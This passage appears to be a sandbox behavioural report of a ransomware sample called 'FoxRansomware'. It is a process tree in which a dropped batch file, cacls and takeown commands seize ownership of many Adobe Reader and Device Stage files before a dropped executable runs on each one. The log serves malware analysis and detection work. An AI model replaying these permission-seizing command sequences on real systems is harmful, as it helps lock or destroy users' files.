C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp"3⤵PID:2496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "usa03.hsp" -nobanner3⤵
- Loads dropped DLL
PID:2460 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "usa03.hsp" -nobanner4⤵
- Executes dropped EXE
PID:760
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1724
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT""2⤵
- Loads dropped DLL
PID:2368 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G Admin:F /C3⤵PID:3232
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"3⤵
- Modifies file permissions
PID:3180
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "CYRILLIC.TXT" -nobanner3⤵
- Loads dropped DLL
PID:2108 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "CYRILLIC.TXT" -nobanner4⤵
- Executes dropped EXE
PID:1052
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2528
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT""2⤵
- Loads dropped DLL
PID:2552 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" /E /G Admin:F /C3⤵PID:1760
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"3⤵PID:2852
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "CP1252.TXT" -nobanner3⤵
- Loads dropped DLL
PID:3204 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "CP1252.TXT" -nobanner4⤵
- Executes dropped EXE
PID:3740
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3612
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""2⤵
- Loads dropped DLL
PID:2424 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C3⤵PID:1668
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"3⤵
- Modifies file permissions
PID:2916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "directories.acrodata" -nobanner3⤵
- Loads dropped DLL
PID:3096 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "directories.acrodata" -nobanner4⤵
- Executes dropped EXE
PID:1588
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif""2⤵
- Loads dropped DLL
PID:3284 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C3⤵PID:1528
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"3⤵PID:976
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "ended_review_or_form.gif" -nobanner3⤵
- Loads dropped DLL
PID:2492 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "ended_review_or_form.gif" -nobanner4⤵
- Executes dropped EXE
PID:2584
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""2⤵
- Loads dropped DLL
PID:3876 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C3⤵PID:3148
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"3⤵PID:2036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "reviewers.gif" -nobanner3⤵
- Loads dropped DLL
PID:3552 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "reviewers.gif" -nobanner4⤵
- Executes dropped EXE
PID:3956
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3772
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif""2⤵
- Loads dropped DLL
PID:4016 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C3⤵PID:584
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"3⤵PID:1532
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "server_lg.gif" -nobanner3⤵
- Loads dropped DLL
PID:3720 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "server_lg.gif" -nobanner4⤵
- Executes dropped EXE
PID:3036
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2172
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif""2⤵
- Loads dropped DLL
PID:2184 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C3⤵PID:2904
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"3⤵PID:3236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "turnOnNotificationInTray.gif" -nobanner3⤵
- Loads dropped DLL
PID:2116 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "turnOnNotificationInTray.gif" -nobanner4⤵
- Executes dropped EXE
PID:2328
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf""2⤵
- Loads dropped DLL
PID:3624 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C3⤵PID:3596
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"3⤵PID:888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "MinionPro-Bold.otf" -nobanner3⤵
- Loads dropped DLL
PID:3752 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "MinionPro-Bold.otf" -nobanner4⤵
- Executes dropped EXE
PID:3356
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:284
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm""2⤵
- Loads dropped DLL
PID:3796 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C3⤵PID:1948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"3⤵
- Modifies file permissions
PID:2836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "zy______.pfm" -nobanner3⤵
- Loads dropped DLL
PID:3564 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "zy______.pfm" -nobanner4⤵
- Executes dropped EXE
PID:2944
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1784
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca""2⤵
- Loads dropped DLL
PID:2012 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" /E /G Admin:F /C3⤵PID:3048
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca"3⤵PID:588
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "brt.fca" -nobanner3⤵
- Loads dropped DLL
PID:3304 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "brt.fca" -nobanner4⤵
- Executes dropped EXE
PID:1920
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2092
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp""2⤵PID:676
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp" /E /G Admin:F /C3⤵PID:1976
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp"3⤵PID:1856
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "eng.hyp" -nobanner3⤵PID:3504
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "eng.hyp" -nobanner4⤵
- Executes dropped EXE
PID:968
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt""2⤵PID:1560
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G Admin:F /C3⤵PID:3020
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"3⤵PID:1216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "zdingbat.txt" -nobanner3⤵PID:952
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "zdingbat.txt" -nobanner4⤵PID:2484
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3500
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT""2⤵PID:4060
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G Admin:F /C3⤵PID:2280
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"3⤵PID:664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "TURKISH.TXT" -nobanner3⤵PID:268
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "TURKISH.TXT" -nobanner4⤵PID:3076
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2724
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""2⤵PID:3100
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C3⤵PID:3516
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "behavior.xml" -nobanner3⤵PID:3704
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "behavior.xml" -nobanner4⤵PID:3708
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3348
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""2⤵PID:884
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:3156
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:3848
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:3040
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4044
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""2⤵PID:3416
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:612
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:3864
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:2936
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3084
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:3476
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:3300
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "watermark.png" -nobanner3⤵PID:3452
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "watermark.png" -nobanner4⤵PID:2780
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2356
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""2⤵PID:3652
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:852
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "resource.xml" -nobanner3⤵PID:2348
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "resource.xml" -nobanner4⤵PID:1672
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3136
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif""2⤵PID:2464
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C3⤵PID:3116
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"3⤵
- Modifies file permissions
PID:2996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "br.gif" -nobanner3⤵PID:2288
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "br.gif" -nobanner4⤵PID:3008
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3140
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""2⤵PID:3268
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C3⤵PID:3388
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"3⤵PID:3492
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "form_responses.gif" -nobanner3⤵PID:1684
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "form_responses.gif" -nobanner4⤵PID:1020
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:892
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""2⤵PID:2564
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C3⤵PID:1152
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"3⤵PID:2460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "review_email.gif" -nobanner3⤵PID:1724
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "review_email.gif" -nobanner4⤵PID:3412
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1520
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""2⤵PID:2248
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C3⤵PID:1956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"3⤵PID:2108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "tr.gif" -nobanner3⤵PID:2392
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "tr.gif" -nobanner4⤵PID:2528
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2368
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""2⤵PID:784
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C3⤵PID:1980
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"3⤵PID:2852
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "AdobePiStd.otf" -nobanner3⤵PID:3112
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "AdobePiStd.otf" -nobanner4⤵PID:2384
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3192
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""2⤵PID:528
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:1644
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"3⤵
- Modifies file permissions
PID:1796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6a9E8kW8.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner3⤵PID:3104
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner4⤵PID:2160
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6a9E8kW8.exe6a9E8kW8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1928
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zSiC3lMb.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""2⤵PID:756
-
